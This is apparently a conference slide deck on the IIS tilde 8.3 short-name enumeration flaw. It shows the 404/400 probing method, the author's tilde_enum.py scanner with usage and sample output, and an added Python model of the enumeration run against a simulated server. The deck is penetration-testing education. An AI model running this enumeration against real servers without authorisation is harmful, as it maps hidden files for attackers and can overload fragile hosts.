Posted: 16-Jan-2015 | Category: Technology | Uploaded by: micah-hoffman
IIS TILDE ENUMERATION 1
IIS Tilde Enumeration (re)Exploited
Micah Hoffman @WebBreacher
Who am I?
◦ Pentester
◦ NoVA Hacker
◦ PwnWiki.io curator / czar
◦ Recon-ng module writer
◦ SANS Mentor (SEC542)
◦ Hiker / Backpacker
Sometimes it is the little things…
Low Risk Web Vulnerabilities
Things not directly exploitable
Information Leakage
◦ Directory Listings
◦ Detailed Errors
◦ Configuration Pages
◦ IIS Tilde Enumeration
What is this vuln? IIS Tilde Enumeration Vulnerability
◦ Use HTTP response codes (400 or 404) to determine if a certain file/dir is on the system: IIS 5/6 answers a request for a wildcarded 8.3 short name (e.g. /a*~1*/.aspx) with 404 when a name matching the wildcard exists and with 400 when none does, so the short name can be guessed one character at a time
http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
An example, from the original PDF report
When completed, 8.3 file names are revealed (e.g., docume~1.htm)
Tilde Java POC Scanner
Pros
◦ POC that there is a vuln
◦ Free on Google Code
◦ Fast
Cons
◦ Java
◦ Not recursive
◦ Only gives 8.3 names
◦ Can't surf to 8.3 files = Low Risk Vuln
How can I do it better? Make it in Python
Guess the file and dir names using wordlists
◦ Get us real, full file and dir names (a short name such as docume~1 becomes a list of candidate long names to request)
Recursivenessitivity
◦ Go deep (run the enumeration again inside every directory it finds)
Verbosity
◦ Show me whatcha finding
◦ Gimme response sizes (compare a hit against the size of a known-bad request to reduce false positives)
Rate limiting for those 'fragile' systems
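As an added example (not code from the slides or from tilde_enum), the Python below models both halves of the approach: the character-by-character 8.3 enumeration behind the 404/400 check described earlier, and the wordlist expansion plus response-size check from this slide. It runs offline against a simulated server; the server, its file names, the soft-404 page size and the wordlist are all constructed for the example, and the 8.3 generation rules are simplified (no ~2 collisions, no hashed names).

```python
"""Added example: a self-contained model of IIS 6 tilde enumeration and of
the wordlist expansion step. It is not code from the slides or from
tilde_enum; the server, file names, page sizes and wordlist are constructed,
and the 8.3 generation rules are simplified (no ~2 collisions, no hashed
names)."""
import fnmatch
import string

CHARSET = string.ascii_lowercase + string.digits + "_-"  # assumed probe alphabet
SOFT_404_SIZE = 1635  # constructed: size of the simulated "not found" page

# Constructed sample web root. "ab.htm" already fits 8.3, so it gets no ~1
# name and tilde enumeration cannot see it (the "< 3 char" shortcoming).
SAMPLE_ROOT = ["documentation", "javascript", "parameter.xml",
               "_vti_inf.html", "ab.htm"]


def short_name(name):
    """Simplified NTFS 8.3 generation: the ~1 short name of a long name,
    or None when the name already fits 8.3."""
    base, _, ext = name.rpartition(".") if "." in name else (name, "", "")
    clean = base.replace(".", "").replace(" ", "").upper()
    if clean == base.upper() and len(clean) <= 8 and len(ext) <= 3:
        return None
    return clean[:6] + "~1" + ("." + ext[:3].upper() if ext else "")


def make_iis6(root):
    """Simulated IIS 6 root. probe() models the 404/400 difference the
    slides rely on; fetch() models a server that answers 200 for every
    path, so a missing file shows only as the soft-404 page size."""
    shorts = [s for s in map(short_name, root) if s]

    def probe(path):  # e.g. "/docu*~1*/.aspx"
        pattern = path.strip("/").split("/")[0].upper()
        hit = any(fnmatch.fnmatchcase(s, pattern) for s in shorts)
        return 404 if hit else 400

    def fetch(path):  # returns (status, body length)
        name = path.strip("/")
        return (200, 1000 + len(name)) if name in root else (200, SOFT_404_SIZE)

    return probe, fetch


def enumerate_short_names(probe):
    """Recover every 8.3 name in the root one character at a time."""
    found, stack = [], [""]
    while stack:
        prefix = stack.pop()
        for ch in CHARSET:
            cand = prefix + ch
            if probe(f"/{cand}*~1*/.aspx") != 404:
                continue  # no short name starts with cand
            if probe(f"/{cand}~1*/.aspx") == 404:  # a name ends exactly here
                found.append(cand + "~1" + _extension(probe, cand + "~1"))
            if len(cand) < 6:
                stack.append(cand)  # longer names may share this prefix
    return sorted(found)


def _extension(probe, stem):
    """Grow the extension of a found stem ("docume~1") up to 3 characters."""
    if probe(f"/{stem}.*/.aspx") != 404:
        return ""  # directory, or no extension
    ext = ""
    while len(ext) < 3:
        for ch in CHARSET:
            if probe(f"/{stem}.{ext}{ch}*/.aspx") == 404:
                ext += ch
                break
        else:
            break
        if probe(f"/{stem}.{ext}/.aspx") == 404:  # exact match: complete
            break
    return "." + ext


def expand(short, wordlist, fetch, baseline_size):
    """Turn an 8.3 name back into full names: keep wordlist entries whose
    short name is the one found, request each, and drop answers the same
    size as the dummy-request baseline (the tool's false-positive filter)."""
    confirmed = []
    for word in wordlist:
        if short_name(word) and short_name(word).lower() == short:
            status, size = fetch("/" + word)
            if status == 200 and size != baseline_size:
                confirmed.append((word, size))
    return confirmed


if __name__ == "__main__":
    probe, fetch = make_iis6(SAMPLE_ROOT)
    _, baseline = fetch("/lJP7ROxEoS.htm")  # dummy request, as tilde_enum does
    wordlist = ["documentation", "documents", "document", "javascript",
                "parameter.xml", "parameters.xml", "_vti_inf.html"]  # constructed
    for short in enumerate_short_names(probe):
        print(short, "->", expand(short, wordlist, fetch, baseline))
```

The dummy request establishes what "not found" looks like on this server; any wordlist candidate whose answer is the same size is discarded even though the status is 200, which is why "documents" and "parameters.xml" drop out while "documentation" and "parameter.xml" are confirmed.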
tilde_enum.py https://github.com/WebBreacher/tilde_enum
$ ./tilde_enum.py -h
usage: tilde_enum.py [-h] [-b] [-d DIRWORDLIST] [-f] [-u URL] [-v] wordlist

Exploits and expands the file names found from the tilde enumeration vuln

positional arguments:
  wordlist        the wordlist file

optional arguments:
  -h, --help      show this help message and exit
  -b              brute force backup extension, extensions
  -d DIRWORDLIST  an optional wordlist for directory name content
  -f              force testing of the server even if the headers do not report it as an IIS system
  -u URL          URL to scan
  -v              verbose output
tilde_enum.py Example
$ ./tilde_enum.py -u http://iis /pentest/fuzzdb/discovery/predictableres/raft-small-words-lowercase.txt
[-] Testing with dummy file request http://iis/lJP7ROxEoS.htm
[-] URLNotThere -> HTTP Code: 404, Response Length: 1635
[-] Testing with user-submitted http://iis
[-] URLUser -> HTTP Code: 200, Response Length: 1433
[+] The server is reporting that it is IIS (Microsoft-IIS/6.0).
[+] The server is vulnerable to the tilde enumeration vulnerability (IIS/5|6.x).
[+] Found a new directory: docume
[+] Found a new directory: javasc
[+] Found file: parame . xml
[+] Found file: 765432 . htm
[+] Found file: _vti_i . htm
[+] Found a new directory: _vti_s
[-] Finished doing the 8.3 enumeration for /.
tilde_enum.py Example (cont.)
---------- FINAL OUTPUT ------------------------------
[*] We found files for you to look at:
[*] http://iis/_vti_inf.html - Size 1754
[*] http://iis/documentation/advertising.html - Size 227
[*] http://iis/documentation/default.aspx - Size 1433
[*] http://iis/javascript/321.xlsx - Size 227
[*] http://iis/parameter.xml - Size 1307

[*] Here are all the 8.3 names we found.
[*] If any of these are 6 chars and look like they should work, try the file name with the first or second instead of all of them.
[*] http://iis/documentation/advert~1.htm
[*] http://iis/documentation/defaul~1.asp
[*] http://iis/765432~1.htm
[*] http://iis/_vti_i~1.htm
[*] http://iis/parame~1.xml
[*] http://iis/javascript/321~1.xls
Shortcomings… for now
Doesn't find all the files
◦ < 3 char file names
◦ ab.htm -> abJHG7.htm
◦ Some other files are just missed
◦ Odd file names (test.htm.bak, Copy of micah.html)
◦ Words not in the word list
Can DoS fragile servers
Needs more 'real-world' testing
No IIS7.x
Future Features
Better file/dir detection
Peek into authentication-required dirs
Pull back file content and store locally
IIS7 support
Your suggestions
Conclusions
Investigate the low risk vulns
Challenge yourself to enhance your tools
◦ Don't settle. Create!
Share with the community
Questions?
https://github.com/WebBreacher/tilde_enum
http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
Micah Hoffman @WebBreacher, Novahackers.com